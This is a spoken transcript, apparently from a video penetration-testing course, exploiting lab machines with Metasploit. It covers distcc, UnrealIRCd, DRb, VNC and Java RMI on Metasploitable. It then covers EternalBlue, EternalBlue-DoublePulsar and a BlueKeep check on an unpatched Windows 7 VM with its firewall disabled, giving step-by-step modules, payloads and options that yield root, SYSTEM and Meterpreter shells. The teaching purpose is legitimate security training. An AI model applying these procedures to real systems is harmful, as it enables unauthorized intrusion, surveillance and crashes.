you want to continue connecting? I want to specify yes right here. And it will ask me for the password for this specific account. And we know that the password is MSF admin, so I will type it right here. And here it is. We opened the terminal of the Metasploitable. If I type who am I, we are MSF admin. And that would be about it for the SSH brute force attack. Don't worry, real brute force attacks we will perform later regarding website login forms and Wi-Fi cracking. This video was just to introduce you to the concept of brute forcing. If you were to exploit a target like this in real life, it would be considered weak credentials or default credentials vulnerability, and you would of course write it down as a critical vulnerability. Great, that is another vulnerability covered. Let's go and hunt the next one down in the next video. Okay, it is time for a small challenge. We can say we are getting more and more familiar with MSF console and exploitation, and by now you should be familiar with the entire process of searching for a vulnerability and trying to exploit it. Let's put all of that to the test. So for now, we covered about 4 to 5 vulnerabilities on the Metasploitable virtual machine. And what I want you to do in this video is find 3 different vulnerabilities that will give you a shell back on the target machine. You can use any tools that you want, besides searching for links that will give you the exact steps to exploiting the vulnerability. And feel free to use Google if you want to see if a software is vulnerable. You can also use Searchploit to see whether you have exploit in your database. You can use Nmap to scan and Metasploit framework to exploit. After we do this challenge, we are ready to move on to some harder Windows exploits. And after that, we're going to see how to exploit the target without using MSF console and without having an exploit available inside of our Kali Linux machine. Okay, great. So pause this video right now, give yourself 10 to 20 minutes and try to find 3 different vulnerabilities on the Metasploitable. That will give you a shell back. I myself will do it right now, so if you don't want me to spoil it for you, then try to find them first and then watch this video. The harder part is to find them, however, once you find them, it is easy to exploit them. Let's get straight into it. Let's start by scanning the target for all the open ports and its services. So what I'm going to do is I will perform the usual Nmap version scan on my Metasploitable, and I will use -p-, which stands for scan all 65,000 ports. If I press here enter my password, and by the way, of course the vulnerabilities that we covered don't count at the moment. We will not pay attention to them at all right now. We want to find new vulnerabilities. So while this scan is working, I will go to a second terminal and I will start the MSF console. And I will also open a third terminal in case we need something like a Searchsploit or some other tool to run right here. So the goal is to find 3 vulnerabilities. Let's see after our scan finishes whether we manage to do so. And here are the results of the scan. So we got a bunch of ports open as usual. And let's go and pick any one of them. For example, I know for a fact that this dist-c open port, which is 3632, is vulnerable. It is running dist-c version 1. And if I go to my Metasploit framework and I just type search dist-c, I will only get one exploit available. Dist-c execute or daemon command execution. It is ranked excellent. So since this is the only exploit, let's give it a try. I will copy it, I will type use, and then paste the exploit name, clear the screen. We can show info just to know what this exploit does, and it says that this module uses a documented security weakness to execute arbitrary commands on any system running dist-c cd. And our system is indeed running dist-c cd. So what we're going to do is we're going to type show options and set the rhosts to be the IP address of our Metasploitable. Let's see show payloads. So we got quite a few payloads right here. Let us use this one, CMD Unix reverse. So this is reverse TCP over Telnet. Let's set it right here. Since at the moment, if I show options, we don't have any payload set up. Let's set payload CMD Unix and then reverse. Show options once again. Now we need to set the lhost, so I will type sudo ifconfig, enter my password. My IP address is 192.168.1.8. Let's copy it and let's set lhost to be equal to that IP address. Now if we triple check all of our available options, we should be good to go. Let us run our exploit. And here it is. First one is over. We got the command shell session 1 opened on the target machine. If I type who am I, we're daemon. If I type ls or print working directory, we are in the /tmp directory. Hostname command will tell us that we are Metasploitable, and uname-a will tell us that we are Linux Metasploitable 2.6.24. And here we also get some other information such as date and which version of Linux it is. Great. So first one is done. Let us Control-C this, abort session 1, select yes, and let's go back to our scan to find another vulnerability. So if you remember, during our scans, once we performed the vulnerability scan, we noticed that this Unreal IRC was vulnerable. We got from some of our scans result that this specific service is vulnerable to some type of the attack. So let's give it a try. Let's go to our Searchsploit and type Searchsploit IRC. And this gives us a bunch of different information. So this isn't really useful for us. Let's try it like this. Let's go to our scan and copy Unreal RCD, which is the version. And now if I type Searchsploit and then the name of the version, well, we narrow it down to 4 results. and one of them doesn't count since it is remote denial of service. Out of all of this, we got one Ruby exploit, which means it belongs to Metasploit framework. It is for the version 3.2.8, and it is backdoor command execution. Let's search it inside of our Metasploit framework. So search, and then Unreal RC. And we do get indeed only one exploit for this. It is ranked excellent, and it is from 2010. Let's copy it. Right here, copy selection, and as usual, use this exploit. Show info will tell us that this module exploits a malicious backdoor that was added to the Unreal RCD 3.2.8 download archive. So as it says, this module will exploit some malicious backdoor that was added in this specific version. And if we show options, we need to set the rhosts as in the previous exploit, and we also need to set the payload, but before we set it, let's show our available payloads first. Show payloads, pardon me, not show options, and we get the same result as previously, so we're just going to go with the reverse TCP over Telnet. And if I type set payload and then paste the payload name. Now we need to set the lhost to be the IP address of our Cal Linux machine, and if we triple check our options, everything is set, type run, and here it is, command shell session 2 open. We got the second exploit down. Let's check out if it works. Who am I? We are the root account. Host name will tell us we're Metasploitable. So this is the second one down. We got one more left to go. Let's Control-C this, go back to our scan, and we're doing this really fast tempo because we already are familiar with all of these tools and techniques that we use to exploit these vulnerable softwares. If you didn't manage to find 3 different exploits, don't worry, this comes with the practice. So after some time of practicing, you will be able to find even more than 3 exploits. Let's continue on the third one. So if I go down here and check out what different services we got running, this one, which is running over port 8787, running service DRB, I know for a fact that it is vulnerable. So let's give it a try. The service name is DRB. So if I type in my search exploit DRB, well, we only get a few results right here. And it doesn't seem that any one of them belongs to the Metasploit framework, as we can see right here, since these are Python files. So let's just double check. Whoops, not here. Let's just double check right here if we can find something regarding DRB, and we do manage to find it. So we got these 2 exploits, which are for the multi, and we got this DRB remote code execution. And it says distributed Ruby remote code execution. And if I go right here under the version, we can see that it is running Ruby. So let's just give it a try. You never know. If we copy this exploit, which says DRB remote code execution, and we use it right here, show our options, we can see by default it has set the payload to be CMD Unix reverse netcat, and we got 2 different things to set up. Matter of fact, one of them is URI, which is not really needed, so we can only set rhosts. And for some reason, it does say that rhost is not required, but I'm not really sure how it is not required, so we will just specify it anyway. Set rhosts 192.168.1.7. Since the payload is already been set, let us just run the exploit. And here it is. We got command shell session 3 open. Let's type who am I? We are root account, and once again host name will tell us we're Metasploitable machine. And with this, we completed our challenge. We found 3 different vulnerabilities that gave us a shell back. But these are not the only ones. So matter of fact, let me just show you 1 or 2 more that you could have found if you performed this challenge. The one that is a little bit different to exploit is this VNC service running on port 5900. It is running protocol 3.3. And if we just search in the search exploit, search VNC, VNC, we will get a bunch of the results right here. So let's add the version 3.3, and we do get some of the responses right here, but it does say that these are for Windows. Now, we are not going to give up just because we cannot find the exploit using search exploit. Matter of fact, it probably is somewhere right here, just there is a bunch of results and we don't really want to read through all of this to find the exploit that we need. So let's just go straight to the Metasploit and type search VNC. And if I scroll all the way up, since these are just payloads, I come to exploits, we can see there are about 5 or 6 exploits. And these 4 are for Windows, so we can forget about them straight away. We got this one, and we got this one. This one seems interesting. It is an exploit for multiple operating systems, for VNC, and it says VNC keyboard execution. So let's just copy the name and see whether it works. Now, this is just a part of penetration test. If you don't know an exact exploit, you simply just try a few different ones and see if they work. Just get used to it that some exploits will sometimes not work, and you will have no idea why they don't work. So let's just type set, or pardon me, let's just type use, and then the exploit name. And this seems that it isn't an exploit for us, since it is also setting the Windows payload. We cannot find a VNC exploit, so what are we going to do? Well, if I go right here, and instead of searching for an exploit, I simply just try to connect to the VNC using a tool called VNC Viewer, and all I need to specify to connect to is the IP address to that target machine. Press enter. It seems to be asking for a password. Well, let's try MSF admin, which is the usual password for everything in Metasploitable, and it tells us authentication failure. But if I try it once again, and as a password, I simply just type password, well, it worked. The VNC viewer password was just password. And now I got root shell open on the Metasploitable. I can execute commands right here, such as ifconfig, such as hostname, ls, and I can see anything that is on the target machine. So this exploit was a little bit different because it was due to a weak password. I just connected to the VNC and I typed password, and it granted the access to the root shell of the Metasploitable. Great. To exit this, I can type exit, and I can exit this desktop right here. And let me show you just one more, and then we're going to end the video. And that one is over port 1099. It is running Java RMI, and if I go in my Metasploit framework and search for Java_RMI, well, we get 2 exploits right here. Let's try with this one first. So exploit multi, misc Java RMI server, copy the exploit name, go right here and type use. It will set the default payload to be Java Meterpreter reverse TCP. Now this is the first time that we're encountering a Meterpreter payload. You will see that it is a little bit different than all the other shells that we got in the previous exploits. So if I type show options, there are a bunch of things that I need to set. Our payload options has already been set to correct one, to the correct IP address and to the correct port. All we need to set right here is the R hosts. You can just leave the server host and server port to be 0.0.0.0 and 8080. If I go right here and type set R hosts 192.168.1.7 and I run this, well, here it is. We got the Meterpreter session 4 open. And if you want to execute the commands, you can just wait for this exploit to finish, and even though it says right here exploit failed, if I type sessions, I will have the Meterpreter session 4. And I can enter that session by typing sessions and then -i, and then the ID of that session, which in my case is 4, and I've entered the Meterpreter shell. Right here the commands are different. To check out all of the commands that we can run with the Meterpreter, we can type the help command. And you can see it is split into different sections, such as file system commands, such as core commands, and all of these commands work with Meterpreter shell. We can download and upload files, we can execute a command, we can screen share, we can perform a screenshot of the target machine, we can record the microphone, and many other things that we're going to check out later. But for now, we can use a command called shell to enter the command shell with the target machine. So if I type who am I once again, right now I'm a root account with the IP address of the Metasploitable. Great. Now I left this Meterpreter shell for the end, just so we can slowly start getting into using Meterpreter shell on our target machine. As we can see, there is a lot of the commands that we can run. Now, in the next video, we're going to start with Windows exploitation. And in Windows exploitation, we're most likely always going to want to open a Meterpreter shell. So that would be about it for this challenge. Once again, if you managed to find 3 different vulnerabilities, congratulations. If not, don't worry, this comes with practice. Now that we covered Metasploitable vulnerabilities, which were rather easy, it is time to move on to the Windows vulnerabilities. See you in the next video. Welcome back. It is time we switch things up a little bit and move on to a different target. For the next few videos, we're going to be attacking Windows 7 machine. And the difference between exploiting Windows 7 and the Metasploitable that we were attacking in the past few videos is inside of Windows 7, we are not going to install any additional software. So these exploits will work on anyone that uses Windows 7 and hasn't updated their operating system, which is most likely everyone running some pirated version of Windows. For this, you will need to install Windows 7 Virtual Machine. And I got mine right here, it is currently up and running. And you will need to install them inside of your VirtualBox first. You can take a look at YouTube how you can download Windows 7 ISO file, since the ISO file is something that you will need for the installation of VirtualBox Windows machine. And if you can, try to download the 64-bit version of Windows 7. Once you get the ISO file, the installation process is rather easy. Just go to the VirtualBox, then click on New right here. You can type in anything you want, you can call it Windows 7. You can select right here which version you got, either 32-bit or 64-bit. And once you select it, click on Next. Let me just see right here, cannot create. This folder already exists. Yeah, this folder already exists because I have already created the Windows 7 machine. But if I call it, for example, Windows 77, just so I can change the name of the virtual machine, click on Next. Here what you want to do is you want to add at least 2 GB of RAM. Now, in case you don't have 2 GB of RAM, feel free to add 1 GB, but in that case I'm not sure whether it will work, since I haven't really tried it. Once you create the virtual machine and set the RAM, you can click on Next. Right here select Create a Virtual Hard Disk Now. Click on Next, Next, Next. Here you can select the hard disk size. You don't need to go too much, you can just choose something like 20 to 30 GB, click on Create, and your virtual machine will be right here. Once you do all of that, there are just a few more settings that you need to set up, so just go right here onto the settings. And in the storage, you want to delete this empty right here. And under the controller, you want to add the Windows ISO file. So in my case, here is mine, Windows 7 Ultimate x64.iso. I would choose that one, and then I would proceed to the network settings and change from the NAT to the bridged adapter. Select your adapter right here and click on Create. After you do all of this, you can start your process of installing Windows 7. And the process is rather easy, as I already mentioned. However, there is one important step that we need to pay attention to. And I got the screenshot of that step right here on my desktop. As far as I remember, this step happens, I believe, at the very end of installation, and here it asks us help protect your computer and improve Windows automatically. Here we want to select the last option, which is Ask Me Later. It says for that option until you decide your computer might be vulnerable to security threats. And by selecting this, we are simulating a vulnerable Windows 7 machine that wasn't regularly updated. Once you do all of this, you should be ready to go. The other steps of installation are not important, just remember, once you get to this step, select Ask Me Later. Okay, so right now I got both of these machines up and running. I got Kali Linux and Windows 7. And if I go to my VirtualBox right here, and besides this Windows 77 machine right here that I created right now, so I will just delete it since I don't really need two Windows 7 machines. Besides it, you will see I got these two Windows 7 machines. So I got Windows 7 32-bit and Windows 7 64-bit. And both are installed with a different ISO file. And the reason why I got two of them is just to show you that sometimes some of the exploits won't work. And that doesn't mean you didn't perform the exploit correctly. It's just that sometimes they just don't work. Whether it is due to architecture or some Windows update, it doesn't matter. Just you will see that, for example, some of the exploits will work on this version of Windows 7, but on this one, it will not work. Now, there is also one thing that we must do on the target machine before we actually attack it. So once you install Windows 7 and you have it up and running, go to it, and from the desktop, you want to type Control Panel. And in the Control Panel, we want to disable the firewall. The reason we do that is because the attack that we're going to perform targets port 445, which is by default open on Windows machines. However, it is also by default being filtered by a firewall that is automatically on every time you install a Windows machine. So for our exploits to work, target has to have that port unfiltered by the firewall for us to be able to exploit it. In companies and larger networks, that usually is the case. This port will be open and unfiltered. Why? Well, because it is SMB protocol or server message block protocol. It is used in network file sharing, and it allows applications on a computer to read and write to files and to request services from server programs in a computer network. It is basically used for different directory access or for printer access or something similar. That's why it is usually open inside companies without any firewall whatsoever. Let me show you what I mean. If I go right here and under the System and Security, I click on Windows Firewall. I already have it disabled, but by default you should have it like this. So you should have firewall up and running. If I leave the firewall up and running and I go to my Kali Linux machine and scan it real fast, so sudo nmap, we're going to use the synscan. In order for this to work, I need to know the IP address of my Windows 7 machine, so I will just type ipconfig inside of the command prompt and it will tell me it is 192.168.1.8. So if I go back and scan that IP address, input my password, this scan shouldn't take more than just a few seconds, and you will see right here that these ports are open. But for you, they will probably not be open. Why? Well, because you haven't really disabled the firewall yet. So even though I scan it right now once again, while the firewall is on, you can see in the scan results, ports are set to be open. What you are going to see, in case you haven't disabled the firewall already, is you will most likely see 1000 ports filtered. And to fix that, what you can do is go right here, click on Turn Windows Firewall on or off, then select right here Turn off Windows Firewall, and turn off Windows Firewall in the second option as well. Click on OK, and now the firewall is off. Now if you go and perform the scan once again, for me I will have the same results, but for you, you will have much more ports open. And I also get some ports open that weren't open once the firewall was enabled. Besides all of those ports, you should also see the port 139 being open and the port 445 being open. And those are SMB ports. So the key thing to get from this is go to the Windows and disable the firewall. Once again, Control Panel, System and Security, and then Windows Firewall. After you do all of that, you are ready to go. In the next video, we are going to see how to perform one of the most known recent exploits called Eternal Blue. See you in the next video. Hello and welcome back. Time to get our first exploit on the Windows machine. And we will go first with the famous Eternal Blue exploit. It is the NSA exploit that got stolen and leaked, and that was used for the famous WannaCry ransomware attack in 2017. If you want to read more about it, you can Google it right here, and it has a very interesting story. As we can see right here, you will undoubtedly recall the names Shadow Brokers, who back in 2017 were dumping software exploits widely believed to be stolen from the USA National Security Agency, and WannaCry, the notorious ransomware attack that struck only a few months later. You can also read some other information about the exploit, like what is Eternal Blue, and we can see its vulnerability name, CVE 2017 0.3-20148. And as it says, this is a family of critical vulnerabilities in Microsoft SMB version 1, server used in Windows 7, Windows Server 2008, Windows XP, and even Windows 10 running on port 445. You can read some other information as well if you want to. And right here it also tells us that even after 2 years of this exploit being patched, there are millions of machines on the internet that are still vulnerable to this attack. And what this exploit does basically is it exploits a mathematical error inside the SMB. And luckily, we got that exploit right here inside of our MSF console. So for now, what I got right here is the scan of my Windows 7 machine. And your scan should look similarly to mine. Now, these ports right here are not important. What is important is that you have these ports right here open. So port 445 and port 139. Also make sure that your Windows machine is up and running. And if I open my MSF console, right here, we're going to try to find that exploit and test it on our Windows 7 machine. One more thing is that besides this exploit that we have in our Metasploit framework, we also get the auxiliary module for this exploit. What does this mean? Well, it means that we can test the machine to see whether it is vulnerable before we actually exploit it. Let me show you what I mean. If I type right here search and then Eternal Blue, I will get 6 results, 2 auxiliary modules and 4 different exploits. This is the one that we're currently interested in. Exploit Windows for the SMB, and it is called MS17 Eternal Blue. But before we use it, we can use the auxiliary scanner for the SMB and for the same vulnerability, as you can compare these names right here, to see whether our target is vulnerable. So let's test this auxiliary module first. If I type right here use, and then paste the auxiliary module, clear the screen and show my options. There are a few different things that we need to set up, but the only required things is the rhosts. So let's set rhosts to be the IP address of our Windows 7 machine. In my case, it is this one. And if I type show info, so we can also read what this module does, it uses information disclosure to determine whether the Eternal Blue has been patched or not. And here it describes you how exactly does it do it. So if I triple check our options, everything seems to be set. You don't want to change these named pipes, and you also do not want to change the R port. So only thing you need to set up is this rhosts right here. And let us type run. It will finish in just a few seconds, and it will tell me host is likely vulnerable to the Eternal Blue attack. It even gives us the version, Windows 7 Ultimate 7601, Service Pack 1, 64-bit. Great, our target seems to be vulnerable. let us now perform the exploit, and you will see how easy it is. So if I search Eternal Blue once again, I copy the exploit name, which is this one, clear the screen, type use. It will by default set the payload to be Windows Reverse Meterpreter Shell for the 64-bit machine. Now, since it will set this by default, you must consider changing this in case your Windows 7 machine is a 32-bit machine. If it is a 64-bit, you can simply just leave this to be Windows 64-bit Meterpreter Reverse TCP. If it is not, then you want to set payload to be equal to Windows/Meterpreter/Reverse TCP. And you will notice the only difference between this payload and this payload right here is this 64. So this just indicates that this is a 64-bit payload. Now I will not run this command because my Windows 7 machine is 64-bit. I will just type show info. And here we can see the exact definition and description of the exploit. This module is a port of the equation group Eternal Blue exploit, part of this toolkit right here, released by Shadow Brokers. There is a buffer overflow operation in this function right here. The size is calculated in this, so I'm not going to read this, of course, with mathematical error where a D word is abstracted into a word. Okay, so since our target is vulnerable, at least the auxiliary module told us, let us check out the options and let's run the exploit. So here as well we got few things that we need to set up. My payload is automatically set right here to the IP address and the port. These two we do not want to change. The R port we do not want to change, and the R hosts we need to set to the IP address of Windows 7 machine. Once everything is done, we can type run, and this will start our exploit. And in just a few seconds, I should get the Meterpreter reverse shell open on the Windows 7 machine. And here it is. Down here, it will print out this win, which means the exploit worked successfully. And I got my Windows 7 machine. If I type the command get_uid, which stands for get user ID, it will tell me that I'm currently on that machine as the system account. And this is the highest level account on a Windows machine. Great, we successfully exploited our first vulnerability inside the Windows 7 machine. And by the way, since we haven't really covered the Meterpreter yet, remember that we can run the help command, and here we can execute all of these commands that the Meterpreter shell gives us. But for now, we are not going to do that. We're going to cover these commands and a bunch of other commands that we don't have here in the post-exploitation module, which is coming soon. For now, we just want to gain access to the target, and in this video, we successfully did it. But I want to show you one more thing. So don't worry, I know that you're impatiently waiting for us to actually do something on the target, but for now, the goal is to only gain access to it. If you want, you can test these commands by yourself. You can just simply type screenshot, for example, just to show you how it works. And it will take the screenshot of the target's desktop. It will save it in the /home/MrHacker. So let's check out that directory. If I lower my terminal right here and go to the /home/MrHacker, open the folder. Here is the screenshot that we took of the target's desktop. It is saved on our machine. And that is just one of the cool commands that we can do with the Meterpreter shell. Others we will cover later. For now on, let me show you one more thing. If I exit out of this shell, I just want to show you if I open the second Windows 7 machine that I got right here, and there is no difference between these two machines. Just one is a 32-bit and the other one is a 64-bit machine. I just want to show you that on this one, which is the 32-bit one, the exploit will not work. Even though the auxiliary module will tell us that the machine is vulnerable. So I will just wait for this machine to open up. Matter of fact, if I remember correctly, the exploit will crash this Windows 7 machine. It will not manage to gain the Meterpreter shell, but instead this Windows machine will get the blue screen of death, and then it will crash. Let's see what happens. So I will log in to this machine. I will check two things out. Once it opens up, I will check the IP address. So it is 192.168.1.13. And one more thing I will check is whether the firewall is disabled. So I will go to Control Panel, System and Security, and then Windows Firewall. It is open, so I will just close the Windows Firewall. And now if I perform the same exploit, just change the IP address to the IP address of this new Windows 7 machine, and I try to run it, it will start the same. Just after a few seconds, this machine right here should crash. It even tells us right here, host is likely vulnerable to the MS-17, which is the Eternal Blue exploit. So let's see what happens. And here it is. You can see that the Windows machine crashed, and now it is restarting. Also here we can see that the exploit failed. Remember that we got the win message once we exploited the previous Windows 7 target, but right now the exploit failed. Matter of fact, in the second attempt of it exploiting the Windows 7 machine, it crashed the machine. So this is just an example that sometimes an exploit will not work. In the first one, we managed to gain the access to the Windows 7 machine with the Meterpreter shell, but in the second one, we only managed to crash it. However, even if you manage to only crash it, this is something that you will 100% write on a report. This is a vulnerability. You should never be able to crash a target computer just like this. Imagine if this Windows 7 machine was doing something important. And just us knowing its IP address and running this exploit, we managed to crash it. That could cause a lot of problem. Now, if you really want to get this exploit to work, you can try to find a different Windows 7 ISO file and try with it to see if it might work on that one. I would also advise you that if you can, you try to install a Windows 7 64-bit version. And in the next video, we are going to see how we can perform a slightly different version of this exploit using Eternal Blue double pulsar attack. In my personal experience, this one works a little bit better than the Metasploit version of Eternal Blue. And another interesting thing is that we don't have it inside of our Metasploit framework. So what are we going to do? Well, not only are we going to run it in the next video, but I will also show you how we can add the Eternal Blue double pulsar module to the Metasploit framework by ourselves. See you in the next video. Welcome back. Time to check out a variant of Eternal Blue exploit. I prefer to always use this one due to two different reasons. It showed to work more than the default Metasploit framework exploit, and it also has a little better options aimed at both 32-bit and 64-bit Windows systems. Nonetheless, we can read more about Double Pulsar right here. This is the official Rapid7 website, and here we can check out what exactly is a Double Pulsar, when it is used and when did it come out. So here it says Double Pulsar is an implant leaked by the Shadow Brokers group earlier this year that enables the execution of additional malicious code. So you can read right here, but you can also check out different websites in order to find out how exactly does the exploit work in case you're interested in that. But what's important for us in this video is how to run the exploit. Remember, we have no module in Metasploit framework for the Eternal Blue double pulsar. So we must download the exploit ourselves and import it in Metasploit framework. This will be a little bit of a longer video since there are a few things that we need to do to achieve this exploit. The first thing that we must do is install Wine. And what is Wine? Well, Wine is a program that allows us to execute Windows applications on Linux systems. Why do we need this? Well, it is required for Double Pulsar to run. To install it, we can run the following command: sudo dpkg --add -architecture i386 and then these two signs, which mean that we are going to add another command to this larger command, and that is apt get update, and another command is apt get install wine32. So these are three separate commands, and in the last one we're going to install the wine32. If you press enter and type in the password, this command should start executing. Now if it tells you right here this, which is permission denied, then just copy this command without the sudo, enter the root terminal by typing sudo su, and then paste the command. Press enter, and now it should start executing all of these three commands. Now I will control C this because I've already performed this. For you, just wait for this to finish and then proceed with the tutorial. And the reason why we are doing all of this is because we need to get wine directory with the drive C folder. And you might be asking, well, what is that and where do I even find it? Well, sometimes it won't appear after installation. So what we must do is install some Windows program. In this case, let's just go and install Python 2 for Windows on our Kali Linux machine. Not because we need it, but because after we install it, our drive C folder will appear. And if you have no idea what I'm talking about, hang on for just a second and you will see it after we install a Windows program. It is all required for our exploit to run. So navigate to this link right here, which is https www.python.org/downloads/release and then /python-2714 and / at the end. Here we should see this version of Python, and what we are interested in from all of these versions is Windows x86 MSI installer. Click on it and click on Save File. It will start downloading our Windows MSI installer, and once it has finished, we want to go to the downloads directory and open terminal inside of it. Once it does that, we can run the command wine msi execute /i and then the name of the file, which in my case and in your case will be python 2.7.14.msi. Just a small interrupt, this command that I just showed you, make sure to execute it using root terminal. So don't execute it using our regular Mr. Hacker terminal, otherwise in most cases it might not actually work. So what you can do is you can just type sudo su, enter the password for your account, and run the wine msi execute /i and then the name of the file using root terminal. Okay, let's go back to the video. Click enter, and this will start installing Python 2.7.14 as a Windows program. We want to click on next on every step, so next. So this already exists. I will click on yes, and this installation should finish in just a few seconds. Once it is done, you can click on finish, and right now we should have our wine folder in the /root directory. So if I go to the /root directory, I need to go cd /root. Let us just enter the root terminal and go to the /root directory. If we type ls, it will be empty. Did we fail somewhere? Well, not exactly. Once installed, wine will be a hidden directory, which means its name will start with a dot. And by the way, to list all the files inside of a directory, including hidden files, we can run the command ls-la. And here are all the hidden files, including our .wine directory. Now, if you cannot see it, make sure that you run this command, which is wine msi execute /i python 2.7.14 from the root terminal. And just click on next steps, and you should have this .wine folder inside of the /root directory. Great. So if I go to that folder, cd.wine, here I will have drive C folder and some other folders as well. So everything works for now. Now that we got this ready, we can proceed to download our exploit. So go once again to the Firefox, open a second tab and type eternal blue double pulsar. And it will show up this first link, which is a GitHub link. We want to click on it. And since we already know how to install a GitHub tool, let's just do it real quick. We just want to copy this link right here. Go inside our terminal. Let's change the directory to the /home/Mr. Hacker/desktop directory. And once again, I would advise you to run all of these commands using root terminal, otherwise it might not work. And type git clone, paste the command, and it should download the eternal blue double pulsar tool for us. Now, we are not done yet. We must do some modification in order for this tool to be able to open in the Metasploit framework. If I type ls and change to the eternal blue double pulsar, right here we should have two interesting files. One of them is the Ruby file, which is the exploit itself, and the other one is this deps directory. Now this is a directory once again, it is not a file, and you cannot really see that from the root terminal because different file types are not different colors. And that is the only problematic thing. But nonetheless, what we must do is we must copy these two files. So let's go with copy deps first to the user share Metasploit framework, modules, exploits, Windows, and then SMB. And here we can copy the deps directory. And to copy a directory, you just need to add -r at the end. So once again, copying deps directory to the /user/share/Metasploit framework /modules/exploits /Windows and then /SMB. Click enter and it should copy the deps directory there. We want to do the same thing with the eternal blue Ruby file. So copy to the same directory modules, exploit, Windows, SMB, and here we want to copy it. Just for this file, you don't need to add the -r since it is a file and not a directory. Okay, great. There is one more location that we want to copy both of these files, so I will just type once again the same command, just this time I will switch the location to the /root directory. So I will copy the deps in the /root, add -r at the end, and I will copy the eternal blue to the /root directory as well. Great, now we should be ready to go. Let us open our MSF console. While this is opening, make sure that your Windows 7 machine is up and running, and let us straight away check out the IP address of this Windows 7 machine by typing ipconfig 192.168.1.8 for me. And what we want to do once the Metasploit framework opens up is we want to navigate to our eternal blue double pulsar exploit. And remember, we put it inside of the Windows exploit and SMB exploits. So what we can do is we can type use exploit Windows SMB, type the name of the exploit, which is eternal blue double pulsar. So just type eternal blue _ double pulsar. Click enter, and now we got our exploit imported in Metasploit framework. This is an exploit that we didn't have before. Let us show information for it. As it says in the description, this module exploits a vulnerability on SMB version 1 and version 2 protocols through eternal blue. After that, double pulsar is used to inject remotely a malicious DLL. Great. Let's also show options to see what options we got. And up here, we got quite a few of them. And keep in mind that all of them are required. Now, here it tells us that we need to specify the path to the deps directory. So it seems that I made a mistake before. I copied it directly to the root directory and we had to copy the entire file. So what I'm going to do is I'm going to open a second terminal, enter the root terminal, go to the desktop of our Mr. Hacker account, and copy this entire eternal blue double pulsar Metasploit to the root directory. So copy eternal blue to the /root. Make sure to add -r because we're copying a directory, and right now this path should be good and we should not really change it. We can just leave it right here, since deps directory is inside of the eternal blue double pulsar directory, and we just copied it to the root directory. So these two are good. Under the process inject, it tells us right here name of the process to inject to, and we must change to this process name right here for 64-bit machines. Since my Windows 7 machine is a 64-bit, I will type this name right here. And I will change the process to inject since it is not set right here by default. So type set process inject and paste the name of the process and press enter. If your Windows 7 machine is a 32-bit one, you can leave this wlms.exe process to inject to. The R hosts we already know to be the IP address, so 192.168.1.8. The R port we're going to leave to 445. The target architecture, if your Windows machine is a 32-bit, you can leave it to x86. My is 64-bit, so I will set the target architecture to x64. The wine path, and this is why we needed the wine for. We need to set the wine path in order for all of this to work. And right here it is set correctly. Remember, our .wine folder is inside of the root directory, and the drive C folder is inside of the .wine directory. So this is something that we will not change. Another configuration that we want to do is this payload options right here. It is currently set to Windows Meterpreter Reverse TCP. And remember, in one of the last few videos, I told you that this is a payload for 32-bit Windows. If your Windows is 32-bit, once again, you don't need to change this, but if it is a 64-bit Windows, I want to type set payload Windows x64 / meterpreter / reverse TCP. Show options once again. Everything seems to be good now. You can also show targets if you want to, just to see what are all the possible targets that you can attack with this exploit. And once you check all of that out, you can just type run. This will launch our Eternal Blue Double Pulsar exploit on the target machine. It might take a few seconds for it to work. And here it is. Our Meterpreter session is once again open. Exploit works successfully, and we can once again run the commands on the target system. We can enter a shell and get its command prompt. If I type who am I, it says that we're the system level account, so we're the highest privilege account once again. Great. Now, I know that you're impatiently waiting for us to cover this Meterpreter shell and all of its commands, as well as the post-exploitation modules that we can run with it, but hang on for just a little bit more. We got 2 more exploits to cover, and then we can proceed to creating our malicious files and using them, as well as running post-exploitation modules. In the next video, we're going to cover an exploit called BlueKeep, which was discovered in 2019. See you there. Welcome back, and we right now have to cover another vulnerability for Windows. This vulnerability is called BlueKeep, and it came out in 2019. This is a remote desktop protocol, or RDP vulnerability, and what is so special about it? Well, as it says right here on this page, this latest RDP vulnerability could allow hackers to remotely run code at the system level without even having to authenticate. In other words, any unpatched Windows system, from XP to Windows 7, so these are our targets, with an exposed RDP port is a potential target. So this is a serious vulnerability. Matter of fact, many people link it to be as high vulnerability as the Eternal Blue was, which we already covered and which came out in 2017. We can read more about it right here, but as usual, our most important thing is to see how we can exploit it. You can go to this page if you want to find out more about the BlueKeep vulnerability. It even gives some code examples as to what the vulnerability was and how it got patched. Down here, we can see what systems are affected. We got Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Server 2003, Windows Vista, and Windows XP. Exploit potential, it is a remote code execution, as the Eternal Blue was, and number of potential victims are around 1 million. Now, for this attack to work, there is one thing that needs to be enabled on the target system, and that thing is port 3389. Now, this port 3389 is used for remote desktop protocol, and it is often used inside of big and large companies. You will most likely never see it on home devices, unless it is purposely enabled. But in order for us to be able to exploit it, we must enable it on our Windows 7 machine. So what I'm going to do is go to my Windows 7 machine and open the Kali Linux as well. In order to see whether it is enabled, we can use our regular good old nmap, so we can type sudo nmap-ss 192.168.1 and let me check the IP address. ipconfig.8. Perform the scan on your Windows 7 machine, and in just a few seconds we should get results of which ports are open. And right here we do not see port 3389 being open. This means this target is not vulnerable, because that port is closed. In order to make it vulnerable, all we need to do is open the remote desktop protocol. So go to the control panel, system and security, then under the system, on the side you will see this remote settings, click on it, and down here check allow connections from computers running any version of remote desktop. By default it should be don't allow connections to this computer. And as I already mentioned, many large companies have this enabled. We just click on apply, click on OK, we can close this, and if we run the scan once again, right now we will have 3389 port open. Let us see whether it is vulnerable or has it been patched. If I open MSF console, and the exploitation is similar as it was with the Eternal Blue. We got the auxiliary module that will tell us whether the target is vulnerable without exploiting it, and then we have an exploit that will gain access to the target and give us the Meterpreter shell. So what we can do is we can just type the vulnerability name, so search BlueKeep, press enter, and we will see two results right here. As I mentioned, the auxiliary module and the exploit. So let's go with the auxiliary module first. We copy its name, we use and then paste the name of the auxiliary module, clear the screen, show information. This module checks a range of hosts for the BlueKeep vulnerability by binding this channel outside of its normal slot and sending non-DOS packets which respond differently on patched and vulnerable hosts. So this is the way that it will figure out whether the target is vulnerable or not. Let's see what options we need to set. So show options, and there seems to be a few of them. We got the R port, which is 3389. This is something that we will not change. We got the R hosts, so let's set it to the IP address of the Windows 7 machine. We got these four options right here as well, but the only one that is required is this RDP client IP. And it says right here the client IPv4 address to report during connect. And this pretty much doesn't matter. It can be any IP address. For example, I will just leave it to be this one, even though this is an IP address that I do not have on my local network. But I will just leave it on this. And if I go right here and type run, it will tell me the target is vulnerable. The target attempted cleanup of the incorrectly bound MS-D120 channel. This means it is 